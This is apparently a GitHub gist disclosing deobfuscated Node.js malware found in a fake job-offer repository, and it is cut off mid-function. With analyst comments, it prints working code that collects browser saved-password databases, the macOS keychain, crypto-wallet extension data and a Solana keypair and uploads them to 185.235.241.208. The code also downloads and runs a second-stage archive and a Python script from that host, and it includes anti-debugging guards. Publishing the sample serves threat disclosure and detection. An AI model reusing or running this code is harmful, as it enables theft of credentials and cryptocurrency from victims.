
@HyperCrowd
Last active August 22, 2024 11:07
Malware Disguised As Job Offer
// This is the deobfuscated code of a Node.js file that is run from the repository shipped with the job offer.
// It appears to gather all kinds of identification and password-hash files and ships them to 185.235.241.208.
// Obfuscator bootstrap (left over from the packer, not part of the stealer
// logic): keeps rotating the string table returned by _0x55cf() until an
// arithmetic checksum built from _0x1dfb() lookups equals 101689.
// _0x1dfb and _0x55cf are function declarations further down in this file
// (hoisted, so they are available here). A lookup that is not numeric throws
// inside parseInt arithmetic and also just rotates the table.
(function (_0x128376, _0x1cdd7b) {
const _0x370f08 = _0x128376();
while (true) {
try {
const _0x5531ca = parseInt(_0x1dfb(522, '0x43e')) / 1 * (-parseInt(_0x1dfb(497, '0x80')) / 2) + -parseInt(_0x1dfb(372, -46)) / 3 + -parseInt(_0x1dfb(443, 0x65)) / 4 * (parseInt(_0x1dfb(479, '0x90')) / 5) + -parseInt(_0x1dfb(348, '0x375')) / 6 + -parseInt(_0x1dfb(373, -0x23)) / 7 + parseInt(_0x1dfb(502, '0x459')) / 8 + parseInt(_0x1dfb(558, '0x4b1')) / 9 * (parseInt(_0x1dfb(327, -170)) / 10);
if (_0x5531ca === _0x1cdd7b) {
break;
} else {
// Rotate the table by one slot and retry the checksum.
_0x370f08.push(_0x370f08.shift());
}
} catch (_0x25f86e) {
_0x370f08.push(_0x370f08.shift());
}
}
})(_0x55cf, 101689);
// Obfuscator lookup helper: resolves string-table entry (_0x413fb2 - 0x1c5)
// through _0x1dfb. The first and third parameters are unused. It is not
// referenced anywhere else in this listing (dead residue of the packing step).
function _0x21daab(_0x1099f7, _0x413fb2, _0x59789a, _0x55497c) {
return _0x1dfb(_0x413fb2 - 0x1c5, _0x55497c);
}
// Obfuscator lookup helper: resolves string-table entry (_0x45f59e + 0x305)
// through _0x1dfb. The first and fourth parameters are unused. Like _0x21daab
// it is not referenced elsewhere in this listing.
function _0x10ea7d(_0x599a14, _0x385b6d, _0x45f59e, _0xb20d3a) {
return _0x1dfb(_0x45f59e + 0x305, _0x385b6d);
}
// Factory used by the anti-analysis guards below. The function it returns
// behaves differently on its first and later invocations: the first call
// returns a wrapper that runs the supplied callback exactly once (with the
// supplied `this` and the wrapper's arguments) and then discards it; every
// later call returns a no-op function.
const _0x1ab683 = function () {
let _0x16e324 = true;
return function (_0x3d9d31, _0x3d8f75) {
const _0x2e957d = _0x16e324 ? function () {
if (_0x3d8f75) {
const _0x5b8ea0 = _0x3d8f75.apply(_0x3d9d31, arguments);
// Drop the callback so a second invocation of the wrapper does nothing.
_0x3d8f75 = null;
return _0x5b8ea0;
}
} : function () {};
_0x16e324 = false;
return _0x2e957d;
};
}();
// "Self-defending" guard from the obfuscator: the run-once callback applies
// the nested-quantifier regex (((.+)+)+)+$ to the guard's own source text
// (via toString()). On the compact original this is cheap; a reformatted
// (beautified) copy presents a longer input on which this regex shape can
// backtrack catastrophically, which appears to be the intended anti-analysis
// effect. It plays no role in data collection.
const _0x374832 = _0x1ab683(this, function () {
return _0x374832.toString().search("(((.+)+)+)+$").toString().constructor(_0x374832).search("(((.+)+)+)+$");
});
_0x374832();
// Second copy of the run-once factory (identical in behaviour to _0x1ab683
// above): the first call of the returned function yields a wrapper that runs
// the given callback once with the given `this`; later calls yield a no-op.
// Used by the console-silencing guard that follows.
const _0x419b5e = function () {
let _0x2f726e = true;
return function (_0x4bb5bb, _0x1071a9) {
const _0x8557 = _0x2f726e ? function () {
if (_0x1071a9) {
const _0x30bafa = _0x1071a9.apply(_0x4bb5bb, arguments);
// Discard the callback after its single run.
_0x1071a9 = null;
return _0x30bafa;
}
} : function () {};
_0x2f726e = false;
return _0x8557;
};
}();
// Console-silencing guard: obtains the global object (Function("return this")
// with a fallback to `window`), then replaces console.log/warn/info/error/
// exception/table/trace with do-nothing functions whose toString() mimics the
// original method, so any logging an analyst adds prints nothing.
// _0x419b5e.constructor is Function; Function.prototype is itself a no-op
// function, so binding it yields another no-op. Detection note: this
// Function("return this") idiom together with console patching is a reliable
// static marker of obfuscator output.
const _0xe08a41 = _0x419b5e(this, function () {
const _0x532963 = function () {
let _0x17d7f6;
try {
_0x17d7f6 = Function("return (function() {}.constructor(\"return this\")( ));")();
} catch (_0x240ab9) {
_0x17d7f6 = window;
}
return _0x17d7f6;
};
const _0x5383af = _0x532963();
const _0x5f4f46 = _0x5383af.console = _0x5383af.console || {};
const _0x319acf = ["log", "warn", "info", "error", "exception", "table", "trace"];
for (let _0x18efb7 = 0; _0x18efb7 < _0x319acf.length; _0x18efb7++) {
// Fresh no-op per method name.
const _0x32061b = _0x419b5e.constructor.prototype.bind(_0x419b5e);
const _0x3a1881 = _0x319acf[_0x18efb7];
const _0x4d27aa = _0x5f4f46[_0x3a1881] || _0x32061b;
_0x32061b.__proto__ = _0x419b5e.bind(_0x419b5e);
// Make the replacement look like the real console method when inspected.
_0x32061b.toString = _0x4d27aa.toString.bind(_0x4d27aa);
_0x5f4f46[_0x3a1881] = _0x32061b;
}
});
_0xe08a41();
// Runtime dependencies and host fingerprint. `request` is a third-party HTTP
// client (deprecated upstream); the rest is Node core. hostname() is embedded
// later in the upload identifier, platform() selects the Windows/macOS/Linux
// path layout (first letter 'w'/'d'/'l'), and homedir()/tmpdir() root every
// file path used below.
const _0x4bf942 = require('fs');
const _0x10095c = require('os');
const _0x86968b = require("path");
const _0x1e35b1 = require("request");
const _0x7cff4d = require("child_process").exec;
const _0x49f25b = _0x10095c.hostname();
const _0x33f6cf = _0x10095c.platform();
const _0x5043df = _0x10095c.homedir();
const _0x3507e0 = _0x10095c.tmpdir();
// Tilde expansion: a leading "~/" is replaced by the home directory (the
// slash is consumed by the match), and "~name" by <parent of homedir>/name.
const _0x1c8a9f = _0x44f647 => _0x44f647.replace(/^~([a-z]+|\/)/, (_0x39f92e, _0x36e957) => '/' === _0x36e957 ? _0x5043df : _0x86968b.dirname(_0x5043df) + '/' + _0x36e957);
// Existence probe: returns true when fs.accessSync(_0x1b7dae) succeeds (default
// mode, i.e. the path exists and is reachable) and false on any error. Every
// browser-profile path below is checked through this helper before it is read.
function _0x10a6cf(_0x1b7dae) {
try {
_0x4bf942.accessSync(_0x1b7dae);
return true;
} catch (_0x46d148) {
return false;
}
}
// Per-browser profile locations, indexed by platform as used in _0x5ee4ab and
// _0xc3c6be: [0] Windows (under %APPDATA%/.. "AppData/"), [1] macOS (under
// "~/Library/Application Support/"), [2] Linux (under "~/.config/").
const _0x5ed30d = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"];
const _0x45c915 = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
const _0x793f19 = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", 'opera'];
// Chromium extension IDs whose "Local Extension Settings" directories are
// harvested by _0x4b30b9. These look like cryptocurrency-wallet extensions
// (the first ID is MetaMask's); verify the rest against the Web Store listings
// before citing them in a report.
const _0x6521fb = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "aholpfdialjgjfhomihkjbmgjidlcdno"];
// Harvests extension storage from one Chromium-based browser and uploads it.
//   _0x1e85a6 — the browser's "User Data" directory; empty or inaccessible → returns [].
//   _0x2c1b98 — filename prefix identifying the browser ("0_", "1_", ...); '' if omitted.
//   _0x3daa8b — when truthy, also collects ~/.config/solana/id.json.
// For "Default" and "Profile 1".."Profile 199" it lists
// "<profile>/Local Extension Settings/<id>" for every id in _0x6521fb and opens
// each entry whose name contains ".log" or ".ldb" (LevelDB storage files) as a
// read stream named "66_<prefix><profile#>_<id>_<file>". The batch is passed to
// _0x25cbc1 (HTTP upload) and returned. All errors are swallowed. The forEach
// callbacks are declared async but contain no await, so the pushes complete
// before _0x25cbc1 runs.
const _0x4b30b9 = async (_0x1e85a6, _0x2c1b98, _0x3daa8b) => {
let _0x3d40d9;
if (!_0x1e85a6 || '' === _0x1e85a6) {
return [];
}
try {
if (!_0x10a6cf(_0x1e85a6)) {
return [];
}
} catch (_0x370829) {
return [];
}
if (!_0x2c1b98) {
_0x2c1b98 = '';
}
let _0x43433b = [];
// Profile directories: "Default", then "Profile 1" .. "Profile 199".
for (let _0x2806a7 = 0; _0x2806a7 < 200; _0x2806a7++) {
const _0x54ab1e = _0x1e85a6 + '/' + (0 === _0x2806a7 ? "Default" : "Profile " + _0x2806a7) + "/Local Extension Settings";
for (let _0x496495 = 0; _0x496495 < _0x6521fb.length; _0x496495++) {
let _0xc48bf2 = _0x54ab1e + '/' + _0x6521fb[_0x496495];
if (_0x10a6cf(_0xc48bf2)) {
let _0x35e42c = [];
try {
_0x35e42c = _0x4bf942.readdirSync(_0xc48bf2);
} catch (_0x45b13e) {
_0x35e42c = [];
}
_0x35e42c.forEach(async _0x334636 => {
let _0x348a15 = _0x86968b.join(_0xc48bf2, _0x334636);
try {
const _0x8491c = {
filename: "66_" + _0x2c1b98 + _0x2806a7 + '_' + _0x6521fb[_0x496495] + '_' + _0x334636
};
// Only the LevelDB data files are taken; the stream is opened here but
// not consumed until the multipart upload in _0x25cbc1.
if (_0x348a15.includes('.log') || _0x348a15.includes(".ldb")) {
_0x43433b.push({
'value': _0x4bf942.createReadStream(_0x348a15),
'options': _0x8491c
});
}
} catch (_0x1a004d) {}
});
}
}
}
// Optional Solana CLI keypair file, uploaded under a fixed name.
if (_0x3daa8b && (_0x3d40d9 = _0x5043df + "/.config/solana/id.json", _0x4bf942.existsSync(_0x3d40d9))) {
try {
const _0x119346 = {
filename: "solana_id.txt"
};
_0x43433b.push({
'value': _0x4bf942.createReadStream(_0x3d40d9),
'options': _0x119346
});
} catch (_0x133caf) {}
}
_0x25cbc1(_0x43433b);
return _0x43433b;
};
// Harvests Firefox extension storage (Windows layout only: the path is
// AppData/Roaming/Mozilla/Firefox/Profiles under the home directory). For each
// profile whose name contains "-release" it walks storage/default/<moz-extension*>/
// idb/<*.files>/ and opens every non-directory entry as a read stream named
// "<profile#>_<counter>_<file>", then uploads the batch via _0x25cbc1 and
// returns it. Returns undefined when the Profiles directory is absent.
// Unlike _0x4b30b9, the inner readdirSync calls are not wrapped in try/catch;
// a failure there rejects the async forEach callback silently and skips the
// rest of that profile.
const _0x26fc16 = () => {
const _0x1e0ec6 = _0x1c8a9f('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles";
let _0x2ba0fb = [];
if (_0x10a6cf(_0x1e0ec6)) {
let _0x22f691 = [];
try {
_0x22f691 = _0x4bf942.readdirSync(_0x1e0ec6);
} catch (_0x549474) {
_0x22f691 = [];
}
let _0xa73e79 = 0;
_0x22f691.forEach(async _0x6f9271 => {
let _0x2f874b = _0x86968b.join(_0x1e0ec6, _0x6f9271);
if (_0x2f874b.includes("-release")) {
let _0xc7393c = _0x86968b.join(_0x2f874b, "/storage/default");
let _0xe490b3 = [];
_0xe490b3 = _0x4bf942.readdirSync(_0xc7393c);
// Reset per profile and only incremented after the walk below, so it
// is always 0 in the generated filenames.
let _0x36a013 = 0;
_0xe490b3.forEach(async _0x2f7f51 => {
if (_0x2f7f51.includes("moz-extension")) {
let _0x592a90 = _0x86968b.join(_0xc7393c, _0x2f7f51);
_0x592a90 = _0x86968b.join(_0x592a90, "idb");
let _0x4e1469 = [];
_0x4e1469 = _0x4bf942.readdirSync(_0x592a90);
_0x4e1469.forEach(async _0x2bc427 => {
if (_0x2bc427.includes(".files")) {
let _0x4acd59 = _0x86968b.join(_0x592a90, _0x2bc427);
let _0x155b1a = [];
_0x155b1a = _0x4bf942.readdirSync(_0x4acd59);
_0x155b1a.forEach(_0x4c438f => {
if (!_0x4bf942.statSync(_0x86968b.join(_0x4acd59, _0x4c438f)).isDirectory()) {
let _0x557494 = _0x86968b.join(_0x4acd59, _0x4c438f);
const _0x12d04b = {
filename: _0xa73e79 + '_' + _0x36a013 + '_' + _0x4c438f
};
_0x2ba0fb.push({
'value': _0x4bf942.createReadStream(_0x557494),
'options': _0x12d04b
});
}
});
}
});
}
});
_0x36a013 += 1;
}
_0xa73e79 += 1;
});
_0x25cbc1(_0x2ba0fb);
return _0x2ba0fb;
}
};
// Exfiltration sink. Sends a multipart form POST to
// http://185.235.241.208:1224/uploads with fields type='99',
// hid="66_<hostname>" and multi_file=<array of {value: ReadStream, options}>.
// Nothing is sent when the array is empty; the response and any error are
// ignored. Detection note: outbound HTTP to 185.235.241.208 on port 1224, and
// multipart uploads whose "hid" field carries the local hostname, are the
// clearest network indicators of this sample.
const _0x25cbc1 = _0x17b9ff => {
const _0x2d5a4e = {
type: '99',
hid: "66_" + _0x49f25b,
multi_file: _0x17b9ff
};
try {
if (_0x17b9ff.length > 0) {
const _0x14ee2b = {
url: "http://185.235.241.208:1224/uploads",
formData: _0x2d5a4e
};
_0x1e35b1.post(_0x14ee2b, (_0x1e8181, _0x2410e2, _0x41c97d) => {});
}
} catch (_0x25f17d) {}
};
// Resolves the platform-specific "User Data" directory for one browser
// (_0x385a51 is one of the three-entry path arrays above: [1] on macOS 'd',
// [2] on Linux 'l', [0] otherwise, i.e. Windows) and hands it to _0x4b30b9 with
// the filename prefix "<_0x1d8a72>_". The Solana keypair is only requested for
// index 0 (the Chrome call). Errors are swallowed.
const _0x5ee4ab = async (_0x385a51, _0x1d8a72) => {
try {
let _0x206c50 = '';
_0x206c50 = 'd' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/Library/Application Support/" + _0x385a51[1] : 'l' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/.config/" + _0x385a51[2] : _0x1c8a9f('~/') + "/AppData/" + _0x385a51[0] + "/User Data";
await _0x4b30b9(_0x206c50, _0x1d8a72 + '_', 0 == _0x1d8a72);
} catch (_0x2460ca) {}
};
// macOS credential collection (called only on platform 'd'). Gathers:
//   - ~/Library/Keychains/login.keychain, or login.keychain-db if the former is
//     absent, uploaded as "logkc-db";
//   - Chrome "Login Data" for Default/Profile 1..199, uploaded as "pld_<n>"
//     (either a previously made copy "<chrome>/ld_<n>" or, after fs.copyFile,
//     the live database itself);
//   - Brave "Login Data" per profile, uploaded as "brld_<n>".
// Everything collected into _0x2dca92 is uploaded once at the end via
// _0x25cbc1; the copyFile callbacks upload separately. Returns the array.
// The copy step is presumably meant to work around the browser holding the
// live SQLite database open — TODO confirm; the copy error is ignored either way.
const _0x23d512 = async () => {
let _0x2dca92 = [];
let _0x1e2e66 = _0x5043df + "/Library/Keychains/login.keychain";
if (_0x4bf942.existsSync(_0x1e2e66)) {
try {
const _0x26aa8b = {
filename: "logkc-db"
};
_0x2dca92.push({
'value': _0x4bf942.createReadStream(_0x1e2e66),
'options': _0x26aa8b
});
} catch (_0x5105ef) {}
} else {
// Newer keychain file name; uploaded under the same label.
_0x1e2e66 += "-db";
if (_0x4bf942.existsSync(_0x1e2e66)) {
try {
const _0x572c23 = {
filename: 'logkc-db'
};
_0x2dca92.push({
'value': _0x4bf942.createReadStream(_0x1e2e66),
'options': _0x572c23
});
} catch (_0x4b5814) {}
}
}
try {
let _0x5bd64b = _0x5043df + "/Library/Application Support/Google/Chrome";
if (_0x10a6cf(_0x5bd64b)) {
for (let _0x218aec = 0; _0x218aec < 200; _0x218aec++) {
const _0xe2994b = _0x5bd64b + '/' + (0 === _0x218aec ? "Default" : "Profile " + _0x218aec) + "/Login Data";
try {
if (!_0x10a6cf(_0xe2994b)) {
continue;
}
// Staging copy of the profile's Login Data at <chrome>/ld_<n>.
const _0x4b27ce = _0x5bd64b + "/ld_" + _0x218aec;
const _0x23c770 = {
filename: 'pld_' + _0x218aec
};
if (_0x10a6cf(_0x4b27ce)) {
_0x2dca92.push({
'value': _0x4bf942.createReadStream(_0x4b27ce),
'options': _0x23c770
});
} else {
// Copy Login Data -> ld_<n>, then (regardless of the copy result)
// upload the original database in its own batch.
_0x4bf942.copyFile(_0xe2994b, _0x4b27ce, _0x4c96ba => {
const _0x1ce0f7 = {
filename: "pld_" + _0x218aec
};
let _0x3ac7c0 = [{
'value': _0x4bf942.createReadStream(_0xe2994b),
'options': _0x1ce0f7
}];
_0x25cbc1(_0x3ac7c0);
});
}
} catch (_0x3f07b7) {}
}
}
} catch (_0x62f3bd) {}
try {
let _0x26c15c = _0x5043df + "/Library/Application Support/BraveSoftware/Brave-Browser";
if (_0x10a6cf(_0x26c15c)) {
for (let _0x3b7f92 = 0; _0x3b7f92 < 200; _0x3b7f92++) {
const _0x44603e = _0x26c15c + '/' + (0 === _0x3b7f92 ? "Default" : "Profile " + _0x3b7f92);
try {
if (!_0x10a6cf(_0x44603e)) {
continue;
}
const _0x5ea305 = _0x44603e + "/Login Data";
const _0x70887a = {
filename: "brld_" + _0x3b7f92
};
if (_0x10a6cf(_0x5ea305)) {
_0x2dca92.push({
'value': _0x4bf942.createReadStream(_0x5ea305),
'options': _0x70887a
});
} else {
// Fallback reached only when Login Data is missing. The arguments are
// the profile directory and the missing file (swapped relative to the
// Chrome branch), and the callback streams the directory, so this path
// is effectively dead.
_0x4bf942.copyFile(_0x44603e, _0x5ea305, _0x310092 => {
const _0x31d38b = {
filename: "brld_" + _0x3b7f92
};
let _0x16ea8d = [{
'value': _0x4bf942.createReadStream(_0x44603e),
'options': _0x31d38b
}];
_0x25cbc1(_0x16ea8d);
});
}
} catch (_0x290199) {}
}
}
} catch (_0x1d62a2) {}
_0x25cbc1(_0x2dca92);
return _0x2dca92;
};
// Credential collection for a Chromium-based browser on Windows/Linux (called
// on every platform except 'd'). _0x3b8a9c is one of the three-entry path
// arrays; _0x5bf28f is the browser index used as filename prefix. Collects:
//   - "<User Data>/Local State", uploaded as "<idx>_lst" (this file typically
//     holds the browser's encrypted password-storage key; confirm per version);
//   - "<User Data>/<profile>/Login Data" for Default/Profile 1..199, uploaded
//     as "<idx>_<n>_uld".
// The batch is uploaded via _0x25cbc1 and returned. Errors are swallowed.
const _0xc3c6be = async (_0x3b8a9c, _0x5bf28f) => {
let _0x215094 = [];
let _0x567bf0 = '';
// Same platform switch as _0x5ee4ab: 'd' → [1], 'l' → [2], otherwise [0].
_0x567bf0 = 'd' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/Library/Application Support/" + _0x3b8a9c[1] : 'l' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/.config/" + _0x3b8a9c[2] : _0x1c8a9f('~/') + "/AppData/" + _0x3b8a9c[0] + "/User Data";
let _0x5dfc53 = _0x567bf0 + "/Local State";
if (_0x4bf942.existsSync(_0x5dfc53)) {
try {
const _0x526083 = {
filename: _0x5bf28f + "_lst"
};
_0x215094.push({
'value': _0x4bf942.createReadStream(_0x5dfc53),
'options': _0x526083
});
} catch (_0x499ed5) {}
}
try {
if (_0x10a6cf(_0x567bf0)) {
for (let _0x36f1c0 = 0; _0x36f1c0 < 200; _0x36f1c0++) {
const _0x4787d4 = _0x567bf0 + '/' + (0 === _0x36f1c0 ? "Default" : "Profile " + _0x36f1c0);
try {
if (!_0x10a6cf(_0x4787d4)) {
continue;
}
const _0x32d961 = _0x4787d4 + "/Login Data";
if (!_0x10a6cf(_0x32d961)) {
continue;
}
const _0x5ec5b8 = {
filename: _0x5bf28f + '_' + _0x36f1c0 + '_uld'
};
_0x215094.push({
'value': _0x4bf942.createReadStream(_0x32d961),
'options': _0x5ec5b8
});
} catch (_0x2a6583) {}
}
}
} catch (_0x586607) {}
_0x25cbc1(_0x215094);
return _0x215094;
};
// Obfuscator string-table accessor. On first use it captures the (rotated)
// table from _0x55cf() and rewrites itself into a plain lookup that returns
// entry (_0x121b22 - 324); the second argument is ignored. Only the bootstrap
// IIFE at the top and the two dead helpers call it — the deobfuscated code
// below already uses literal strings.
function _0x1dfb(_0x121b22, _0x569bfc) {
const _0x5b1124 = _0x55cf();
_0x1dfb = function (_0x55cf27, _0x1dfbfd) {
_0x55cf27 = _0x55cf27 - 324;
let _0x3a5f9b = _0x5b1124[_0x55cf27];
return _0x3a5f9b;
};
return _0x1dfb(_0x121b22, _0x569bfc);
}
// Obfuscator string table. Strings were split into ~10-character fragments
// and interleaved with random filler so that indicators (the C2 host, the
// "/uploads", "/pdown" and "/client/" paths, browser profile paths, extension
// IDs, the curl/tar/python3 command templates) do not appear as contiguous
// literals; the fragments are still a useful YARA/grep source. On first call
// the function rewrites itself to return the same array instance, which the
// bootstrap IIFE then rotates in place.
function _0x55cf() {
const _0x5a3b91 = ['jDasl', 'bfnaelmome', 'WZANW', 'ocyhZ', 'createRead', 'ITmoQ', 'acmacodkjb', '626586QKOwys', '-db', 'jbmgjidlcd', 'raveSoftwa', 'isDirector', 'QnOeo', 'includes', "/Login Dat", 'qYCXQ', 'oogle/Chro', '/Library/K', 'BraveSoftw', 'writeFileS', 'cfgodnhcel', 'OtRxI', 'brld_', 'Google/Chr', 'multi_file', 'mdjonilkdb', 'ome', 'luVIT', 'aTPfH', 'ess', 'opftO', '593601LJvkBJ', '841778iRRESH', 'YbUxM', "era Softwa", 'bind', '/uploads', 'copyFile', 'type', 'JEJPp', "ctor(\"retu", 'lchlghecda', "\\p.zi", '/ld_', 'exception', 'hid', '_lst', 'Roaming/Op', 'HnztH', 'tbRkY', 'pikoobohma', 'phepccionb', 'dgmoleebol', 'lmeeeajnim', 'nhPVS', 'vArxC', 'QNABQ', 'mnkoeoihof', 'google-chr', 'hzOCu', 'sKbCj', 'replace', '__proto__', 'hifafgmccd', '/pdown', 'fhbohimael', 'length', 'fPJcj', 'nkbihfbeog', 'Local/Goog', 'rXFAW', 'Browser', '/storage/d', 'dirname', 'jgjfhomihk', '/.config/', 'ASXZy', 'prKfQ', 'TwIlw', 'aholpfdial', 'are/Brave-', 'post', 'RXVCE', 'rocur', 'venWy', 'TOOSD', 'trace', 'dvphq', 'logkc-db', "rn this\")(", 'idb', 'fOXRo', 'log', '.235.241.2', 'illa/Firef', '(((.+)+)+)', 'warn', 'search', 'sNyAe', '.files', 'VfvFG', 'pld_', '332VsuwBT', 'accessSync', 'olana/id.j', '/Library/A', 'readdirSyn', 'mCwlp', 'nmhnfnkdna', 'forEach', 'obpzz', 'LypkF', 'ogin.keych', 'sHyUX', 'FYgWS', 'era', '/.npl', 'on.exe', 'Stream', "/.npl\"", 'NsbmG', 'gpafnldhgm', '-release', 'PjIlM', 'lTVRM', 'apagcccfch', "curl -Lo \"", 'rename', 'ocal/Micro', 'CVwNs', 'eofbddgcij', 'Default', 'rmSync', " Support/G", 'hFzaP', 'path', 'vZmKU', 'EhRaM', '6565xQYeIL', 'statSync', 'eychains/l', 'MYSfc', 'ync', 'ibnejdfjmm', 'dCXnR', " Support/", 'pNxZc', 'pekplomjjk', "/Local Sta", 'lBygL', 'NoXjx', 'yfwOi', 'soft/Edge/', "ension Set", 'toString', '/AppData/L', '200mTHErI', 'ion', 'prototype', 'uuEFX', 'oaming/Moz', '223256niZPRB', 'Mdeso', 'eSoftware/', "\\.pyp\\pyth", '/AppData/', 'apply', 'pplication', 'existsSync', 'table', 'rowser', 'YRqkK', 'ox/Profile', 'request', 'size', 'url', 
'homedir', 'yDMWZ', 'lKScI', 'mtwkM', "Profile ", '298yMMeNA', 'lvHTA', 'PuOBA', 'kodbefgpgk', 'push', 'get', "re/Opera S", 'ain', " -C ", 'kkGlZ', 'filename', 'behhmhfood', "/Local Ext", "python3 \"", " Support/B", 'solana_id.', 'dlcobpjiig', 'http://185', 'console', 'renameSync', 'bohpjbbldc', 'exec', 'kpcnlpebkl', 'iZLcK', 'HsAKs', 'SclKp', 'NBGSX', 'moz-extens', 'ngcnapndod', 'kqXRf', 'Local/Brav', 'BwWom', 'constructo', 'QDGqv', "nction() ", 'OJuxT', '300843JNscGT', '/client/', "/User Data", 'RDWcG', 'info', '190QQTawu', 'error', 'hnfanknocf', 'platform', '.ldb', 'join', '/.config/s', 'son', 'tmpdir', 'aBHIV', 'aeachknmef', "\" \"", 'jemss', "User Data"];
_0x55cf = function () {
return _0x5a3b91;
};
return _0x55cf();
}
// Download-progress tracker for the second-stage archive (see _0x3003d9):
// holds the last observed size of <tmpdir>\p.zi, or 51476596 once the
// download is considered complete; reset to 0 on failure.
let _0x4148ac = 0;
// Extracts the downloaded archive into the home directory by shelling out to
// `tar -xf <archive> -C <homedir>` (paths are concatenated unquoted), deletes
// the archive in either outcome, resets the progress tracker on failure and
// on success kicks off the second-stage loader _0x5bc0ed. Detection note: a
// Node process spawning tar against a file in the temp directory is a strong
// host-side indicator here.
const _0x501629 = async _0x237baf => {
_0x7cff4d("tar -xf " + _0x237baf + " -C " + _0x5043df, (_0x2072a1, _0x345f24, _0x49310c) => {
if (_0x2072a1) {
_0x4bf942.rmSync(_0x237baf);
return void (_0x4148ac = 0);
}
_0x4bf942.rmSync(_0x237baf);
_0x5bc0ed();
});
};
// Downloads the second-stage archive from http://185.235.241.208:1224/pdown to
// <tmpdir>\p.zi (via `curl -Lo`), renames it to <tmpdir>\p2.zip and extracts it
// with _0x501629. 51476596 is presumably the expected archive size in bytes —
// TODO confirm. Behaviour when a partial p.zi already exists: if it reached the
// expected size it is renamed and extracted; if it grew since the last check
// the new size is recorded and the check is repeated after 20 s (_0x187c02);
// if it stopped growing it is deleted and the cycle restarts. Note that the
// backslash separators make the temp paths Windows-specific, and the `throw`
// inside the rename callback is not caught by the surrounding try/catch.
const _0x3003d9 = () => {
const _0x3a3cb9 = _0x3507e0 + "\\p.zi";
const _0x3198e3 = _0x3507e0 + "\\p2.zip";
if (_0x4148ac >= 51476596) {
return;
}
if (_0x4bf942.existsSync(_0x3a3cb9)) {
try {
var _0x27df9a = _0x4bf942.statSync(_0x3a3cb9);
if (_0x27df9a.size >= 51476596) {
_0x4148ac = _0x27df9a.size;
_0x4bf942.rename(_0x3a3cb9, _0x3198e3, _0x39725c => {
if (_0x39725c) {
throw _0x39725c;
}
_0x501629(_0x3198e3);
});
} else {
if (_0x4148ac < _0x27df9a.size) {
// Still growing: remember the size and poll again.
_0x4148ac = _0x27df9a.size;
} else {
// Stalled download: discard and start over on the next poll.
_0x4bf942.rmSync(_0x3a3cb9);
_0x4148ac = 0;
}
_0x187c02();
}
} catch (_0x2370ad) {}
} else {
_0x7cff4d("curl -Lo \"" + _0x3a3cb9 + "\" \"" + "http://185.235.241.208:1224/pdown" + "\"", (_0x511ce7, _0x220c64, _0x4db374) => {
if (_0x511ce7) {
_0x4148ac = 0;
return void _0x187c02();
}
try {
// Mark the download complete so concurrent polls return early.
_0x4148ac = 51476596;
_0x4bf942.renameSync(_0x3a3cb9, _0x3198e3);
_0x501629(_0x3198e3);
} catch (_0xe8dc33) {}
});
}
};
// Re-runs the archive download/poll routine _0x3003d9 after a 20 second delay.
function _0x187c02() {
setTimeout(() => {
_0x3003d9();
}, 20000);
}
// Second-stage loader: fetches a script from http://185.235.241.208:1224/client/99/66,
// writes it to <homedir>/.npl and executes it with a Python interpreter.
//   Windows ('w'): requires the bundled <homedir>\.pyp\python.exe (presumably
//   provided by the archive that _0x3003d9 downloads and extracts — TODO confirm);
//   if it is absent the archive download is started instead.
//   Other platforms: runs `python3 "<homedir>/.npl"` with the system interpreter.
// The Promise's resolve/reject are never called, so awaiting this function would
// never return; all callers invoke it without awaiting. Detection note: the
// ".npl" file in the home directory, the ".pyp" directory on Windows, and a
// Node process spawning python with that script are host-side indicators.
const _0x5bc0ed = async () => await new Promise((_0x25ed5d, _0x3d0abd) => {
if ('w' == _0x33f6cf[0]) {
if (_0x4bf942.existsSync(_0x5043df + "\\.pyp\\python.exe")) {
(() => {
const _0x3aee97 = _0x5043df + "/.npl";
const _0x38e97c = "\"" + _0x5043df + "\\.pyp\\python.exe\" \"" + _0x3aee97 + "\"";
// Remove any stale copy before re-downloading.
try {
_0x4bf942.rmSync(_0x3aee97);
} catch (_0x47bcb4) {}
_0x1e35b1.get("http://185.235.241.208:1224/client/99/66", (_0x414c88, _0x478c51, _0x45991a) => {
if (!_0x414c88) {
try {
_0x4bf942.writeFileSync(_0x3aee97, _0x45991a);
_0x7cff4d(_0x38e97c, (_0x2f4109, _0x5a82d5, _0x32d80a) => {});
} catch (_0x476d41) {}
}
});
})();
} else {
// No bundled interpreter yet: fetch the archive first.
_0x3003d9();
}
} else {
(() => {
_0x1e35b1.get("http://185.235.241.208:1224/client/99/66", (_0x25b30d, _0x373ce0, _0x473979) => {
if (!_0x25b30d) {
_0x4bf942.writeFileSync(_0x5043df + "/.npl", _0x473979);
_0x7cff4d("python3 \"" + _0x5043df + "/.npl\"", (_0x190e98, _0x16b004, _0x4a9630) => {});
}
});
})();
}
});
// Counts how many times the 30 s interval below has re-run the collection routine.
var _0x152224 = 0;
// Main collection routine. In order: extension storage for Chrome (index 0,
// which also takes the Solana keypair), Brave (1) and Opera (2); Firefox
// extension storage; on Windows additionally Edge's extension storage under
// AppData/Local/Microsoft/Edge/User Data (prefix "3_"); then credential
// databases — the macOS keychain/Login Data path on 'd', otherwise Local State
// and Login Data for the three browsers. Finally it starts the second-stage
// loader _0x5bc0ed (not awaited). Every error is swallowed.
const _0x59f5ea = async () => {
try {
await (async () => {
try {
await _0x5ee4ab(_0x45c915, 0);
await _0x5ee4ab(_0x5ed30d, 1);
await _0x5ee4ab(_0x793f19, 2);
_0x26fc16();
if ('w' == _0x33f6cf[0]) {
